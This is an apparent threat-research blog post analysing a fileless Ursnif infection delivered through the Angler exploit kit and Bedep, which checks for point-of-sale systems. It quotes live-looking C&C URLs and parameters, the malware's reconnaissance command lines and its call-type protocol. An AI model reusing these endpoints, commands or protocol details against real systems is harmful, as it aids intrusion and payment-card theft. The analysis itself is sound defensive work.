2015-07-05 - Fileless Reco
A fileless Ursnif doing some POS focused reco
Mission Impossible via Brixe63
At begining of June, I noticed a "different" Angler pass.
No drop and Ursnif call backs.
FileLess Angler Pass and Ursnif Callback
Mon, 01 Jun 2015 14:48:06 GMT
Ursnif sent to Bedep infected VM
2014-11-07
C&C calls in november 2014 :
GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1859056880&type=1
200 OK (text/html)
GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1039729551&type=505
200 OK (text/html) < 2ndStage payload
What is new in that June pass is the Fileless execution of this Ursnif. In that context seeing it making some net view and registry CurrentVersion\Uninstall check
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName > C:\Users\[REDACTED]\AppData\Local\Temp\28096234.TMP"
cmd /C "net.exe view > C:\Users\[REDACTED]\AppData\Local\Temp\28097562.TMP"
before calling C&C made me think this might be reco.
XTea decoded from the PCAP the sample I got was :
a619632af465759a3d3d45f39f988c3f
Running it manually i got him to grab (call &type=505) an Andromeda
Fileless Ursnif calling C&C, Grabbing Andromeda.
Andromeda Calling home.
Upon deeper looks it appears that this Ursnif is doing those kind of checks :
Case one :
- POS/SALE/STORE in the Netview output
- some URL in the cache :
choiceadvantage.comCase two :
uhauldealer.com
secure-booker.com
teletracker.com
wupos.westernunion.com
pay1.plugnpay.com
secure.paymentech.com/iterminal/
- some entries in the registry :
VeriFone (advertises itself as the "global leader in secure electronic POS solutions")
(there are 2 strings Citrix and XenApp but do not seems to be directly called)
Case three :
- None of these..so "lower value" (for them) machine.
I made some modif in my systems to fall in case one :
Trying to get the attention of the Fileless Ursnif
76c240311df959961200a20f52b4026c which appears to be a signed
Signed Dll dropped by the Fileless Ursnif
Conclusion: another smart use of the fileless capabilities of Angler.
Side Note:
It seems type 666 and type 922 are other accepted call by the C&C (one of them might be Verifone case)
It seems type 666 and type 922 are other accepted call by the C&C (one of them might be Verifone case)
Crafted C&C Calls - note: type 666 and 922
Fiddler for those who can decrypt the traffic based on the Key is in the package (i'd be happy to hear about it )
Here is a package (multiple samples/pcap/fiddler)
Fileless Angler EK Pass (Pcap associated to first Screenshot )
[Update : 2015-09-04]
It's pushed via Bedep those day :
 |
| Fileless Ursnif pushed via Bedep but again no drop on disc (new to me method in bedep) 2015-09-04 |
C&C : lokingforrealest.net (82.211.31.126)
/yuppi/?user=c54acfbc9b5eef3b729f4025323a731c&id=19&ver=119&os=170393861&os2=512&host=0&k=88401496&type=505
31400 | 82.211.0.0/18 | ACCELERATED | DE | kundenbetreuung.org | IP-Projects GmbH & Co. KG
[/edit]
Thanks :
Will Metcalf, Horgh_RCE and FoxIT for help/inputs.
Post Publication Readings :
Threat actor leverages windows zero-day exploit in payment card data attacks - 2016-05-10 - FireEye
PowerSniff Malware Used in Macro-based Attacks - 2016-03-11 - Palot Alto
Angler Exploit Kit Used to Find and Infect PoS Systems - 2015-07-27 - TrendMicro